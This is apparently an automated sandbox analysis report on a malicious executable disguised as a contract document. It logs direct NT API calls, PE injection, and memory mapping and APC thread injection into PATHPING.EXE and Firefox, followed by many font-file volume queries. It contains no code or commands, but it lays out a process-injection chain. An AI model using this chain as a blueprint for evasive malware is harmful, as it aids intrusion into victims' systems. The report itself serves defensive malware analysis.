                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeMemory written: C:\Users\user\Desktop\draft contract for order #782334.exe base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeSection loaded: NULL target: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeSection loaded: NULL target: C:\Windows\SysWOW64\PATHPING.EXE protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: NULL target: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: NULL target: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXESection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\PATHPING.EXEThread register set: target process: 6468Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\PATHPING.EXEThread APC queued: target process: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeProcess created: C:\Users\user\Desktop\draft contract for order #782334.exe "C:\Users\user\Desktop\draft contract for order #782334.exe"Jump to behavior
                Source: C:\Program Files (x86)\vqwlUwyMIBzWEKfmXxuwFhXFTcJlpydhbFPIEyDRMlNNnCqsCwCoHYZRfqN\RprkEKYwQARXc.exeProcess created: C:\Windows\SysWOW64\PATHPING.EXE "C:\Windows\SysWOW64\PATHPING.EXE"Jump to behavior
                Source: C:\Windows\SysWOW64\PATHPING.EXEProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: RprkEKYwQARXc.exe, 00000006.00000000.2005296610.00000000018E0000.00000002.00000001.00040000.00000000.sdmp, RprkEKYwQARXc.exe, 00000006.00000002.4135168037.00000000018E0000.00000002.00000001.00040000.00000000.sdmp, RprkEKYwQARXc.exe, 00000008.00000002.4135430509.00000000014C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: RprkEKYwQARXc.exe, 00000006.00000000.2005296610.00000000018E0000.00000002.00000001.00040000.00000000.sdmp, RprkEKYwQARXc.exe, 00000006.00000002.4135168037.00000000018E0000.00000002.00000001.00040000.00000000.sdmp, RprkEKYwQARXc.exe, 00000008.00000002.4135430509.00000000014C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: RprkEKYwQARXc.exe, 00000006.00000000.2005296610.00000000018E0000.00000002.00000001.00040000.00000000.sdmp, RprkEKYwQARXc.exe, 00000006.00000002.4135168037.00000000018E0000.00000002.00000001.00040000.00000000.sdmp, RprkEKYwQARXc.exe, 00000008.00000002.4135430509.00000000014C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: RprkEKYwQARXc.exe, 00000006.00000000.2005296610.00000000018E0000.00000002.00000001.00040000.00000000.sdmp, RprkEKYwQARXc.exe, 00000006.00000002.4135168037.00000000018E0000.00000002.00000001.00040000.00000000.sdmp, RprkEKYwQARXc.exe, 00000008.00000002.4135430509.00000000014C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Users\user\Desktop\draft contract for order #782334.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\draft contract for order #782334.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
